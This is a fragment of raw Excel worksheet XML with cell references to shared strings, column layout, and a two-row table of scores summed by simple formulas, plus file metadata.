    <row r="89" ht="15">
      <c r="B89" s="9" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="90" ht="15">
      <c r="B90" s="9" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="91" ht="15">
      <c r="B91" s="9" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="92" ht="15">
      <c r="B92" s="9" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="93" ht="15">
      <c r="B93" s="9" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="94" ht="15">
      <c r="B94" s="9" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="95" ht="15">
      <c r="B95" s="9" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="96" ht="15">
      <c r="B96" s="9" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="97" ht="15">
      <c r="B97" s="9" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="98" ht="15">
      <c r="B98" s="9" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="99" ht="15">
      <c r="B99" s="9" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="100" ht="15">
      <c r="B100" s="9" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="101" ht="15">
      <c r="B101" s="9" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="102" ht="15">
      <c r="B102" s="9" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="103" ht="15">
      <c r="B103" s="9" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="104" ht="15">
      <c r="B104" s="9" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="105" ht="15">
      <c r="B105" s="9" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="106" ht="15">
      <c r="B106" s="9" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="107" ht="15">
      <c r="B107" s="9" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="108" ht="15">
      <c r="B108" s="9" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="109" ht="15">
      <c r="B109" s="9" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="110" ht="15">
      <c r="B110" s="9" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="111" ht="15">
      <c r="B111" s="9" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="112" ht="15">
      <c r="B112" s="9" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="113" ht="15">
      <c r="B113" s="9" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="114" ht="15">
      <c r="B114" s="9" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="115" ht="15">
      <c r="B115" s="9" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="116" ht="15">
      <c r="B116" s="9" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="117" ht="15">
      <c r="B117" s="9" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="118" ht="15">
      <c r="B118" s="9" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="119" ht="15">
      <c r="B119" s="9" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="120" ht="15">
      <c r="B120" s="9" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="121" ht="15">
      <c r="B121" s="9" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="122" ht="15">
      <c r="B122" s="9" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="123" ht="15">
      <c r="B123" s="9" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="124" ht="15">
      <c r="B124" s="9" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="125" ht="15">
      <c r="B125" s="9" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="126" ht="15">
      <c r="B126" s="9" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="127" ht="15">
      <c r="B127" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="128" ht="15">
      <c r="B128" s="9" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="129" ht="15">
      <c r="B129" s="9" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="130" ht="15">
      <c r="B130" s="9" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="131" ht="15">
      <c r="B131" s="9" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="132" ht="15">
      <c r="B132" s="9" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="133" ht="15">
      <c r="B133" s="9" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="134" ht="15">
      <c r="B134" s="9" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="135" ht="15">
      <c r="B135" s="9" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15">
      <c r="B136" s="9" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="137" ht="15">
      <c r="B137" s="9" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="138" ht="15">
      <c r="B138" s="9" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="139" ht="15">
      <c r="B139" s="9" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="140" ht="15">
      <c r="B140" s="9" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="141" ht="15">
      <c r="B141" s="9" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="142" ht="15">
      <c r="B142" s="9" t="s">
        <v>7</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5"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="H11" sqref="H11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="30" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4.25390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="7.625" style="1" customWidth="1"/>
    <col min="3" max="3" width="4.875" style="1" customWidth="1"/>
    <col min="4" max="4" width="12.375" style="1" customWidth="1"/>
    <col min="5" max="5" width="12.625" style="1" customWidth="1"/>
    <col min="6" max="6" width="6.125" style="1" customWidth="1"/>
    <col min="7" max="7" width="12.125" style="1" customWidth="1"/>
    <col min="8" max="8" width="13.25390625" style="1" customWidth="1"/>
    <col min="9" max="9" width="14.375" style="1" customWidth="1"/>
    <col min="10" max="10" width="5.00390625" style="1" customWidth="1"/>
    <col min="11" max="11" width="6.00390625" style="1" customWidth="1"/>
    <col min="12" max="12" width="6.75390625" style="1" customWidth="1"/>
    <col min="13" max="13" width="7.25390625" style="1" customWidth="1"/>
    <col min="14" max="14" width="5.00390625" style="1" customWidth="1"/>
    <col min="15" max="16" width="5.25390625" style="1" customWidth="1"/>
    <col min="17" max="16384" width="16.25390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="30" customHeight="1">
      <c r="A1" s="8" t="s">
        <v>169</v>
      </c>
      <c r="B1" s="8"/>
      <c r="C1" s="8"/>
      <c r="D1" s="8"/>
      <c r="E1" s="8"/>
      <c r="F1" s="8"/>
      <c r="G1" s="8"/>
      <c r="H1" s="8"/>
      <c r="I1" s="8"/>
      <c r="J1" s="8"/>
      <c r="K1" s="8"/>
      <c r="L1" s="8"/>
      <c r="M1" s="8"/>
      <c r="N1" s="8"/>
      <c r="O1" s="8"/>
      <c r="P1" s="8"/>
    </row>
    <row r="2" spans="1:13" ht="18" customHeight="1">
      <c r="A2" s="7"/>
      <c r="B2" s="7"/>
      <c r="C2" s="7"/>
      <c r="D2" s="7"/>
      <c r="E2" s="7"/>
      <c r="F2" s="7"/>
      <c r="G2" s="7"/>
      <c r="H2" s="7"/>
      <c r="I2" s="7"/>
      <c r="J2" s="7"/>
      <c r="K2" s="7"/>
      <c r="L2" s="7"/>
      <c r="M2" s="7"/>
    </row>
    <row r="3" spans="1:16" s="3" customFormat="1" ht="36.75" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>162</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>148</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>135</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>149</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>150</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>136</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>137</v>
      </c>
      <c r="H3" s="4" t="s">
        <v>151</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>152</v>
      </c>
      <c r="J3" s="4" t="s">
        <v>138</v>
      </c>
      <c r="K3" s="4" t="s">
        <v>161</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>155</v>
      </c>
      <c r="M3" s="4" t="s">
        <v>156</v>
      </c>
      <c r="N3" s="4" t="s">
        <v>157</v>
      </c>
      <c r="O3" s="4" t="s">
        <v>166</v>
      </c>
      <c r="P3" s="4" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="4" spans="1:16" s="3" customFormat="1" ht="30" customHeight="1">
      <c r="A4" s="5" t="s">
        <v>164</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>158</v>
      </c>
      <c r="C4" s="4" t="s">
        <v>145</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>159</v>
      </c>
      <c r="E4" s="4">
        <v>11226067120</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>139</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>160</v>
      </c>
      <c r="H4" s="4" t="s">
        <v>153</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>154</v>
      </c>
      <c r="J4" s="4">
        <v>3</v>
      </c>
      <c r="K4" s="4">
        <v>155</v>
      </c>
      <c r="L4" s="6">
        <v>82.7</v>
      </c>
      <c r="M4" s="6">
        <f>J4+K4+L4</f>
        <v>240.7</v>
      </c>
      <c r="N4" s="4" t="s">
        <v>163</v>
      </c>
      <c r="O4" s="4" t="s">
        <v>168</v>
      </c>
      <c r="P4" s="4" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="5" spans="1:16" s="3" customFormat="1" ht="30" customHeight="1">
      <c r="A5" s="5" t="s">
        <v>165</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>141</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>140</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>142</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>143</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>139</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>144</v>
      </c>
      <c r="H5" s="4" t="s">
        <v>146</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>147</v>
      </c>
      <c r="J5" s="4">
        <v>3</v>
      </c>
      <c r="K5" s="4">
        <v>76.5</v>
      </c>
      <c r="L5" s="6">
        <v>67</v>
      </c>
      <c r="M5" s="6">
        <f>J5+K5+L5</f>
        <v>146.5</v>
      </c>
      <c r="N5" s="4" t="s">
        <v>163</v>
      </c>
      <c r="O5" s="4" t="s">
        <v>168</v>
      </c>
      <c r="P5" s="4" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="6" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="7" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="8" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="9" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="10" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="11" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="12" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="13" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="14" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="15" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="16" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="17" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="18" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="19" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="20" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="21" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="22" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="23" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="24" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="25" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="26" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="27" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="28" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="29" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="30" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="31" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="32" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="33" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="34" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="35" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="36" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="37" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="38" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="39" s="2" customFormat="1" ht="30" customHeight="1"/>
    <row r="40" s="2" customFormat="1" ht="30" customHeight="1"/>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:P1"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.3937007874015748" bottom="0.3937007874015748"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2011-10-25T03:09:30Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1996-12-17T01:32:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-26T01:54:42Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>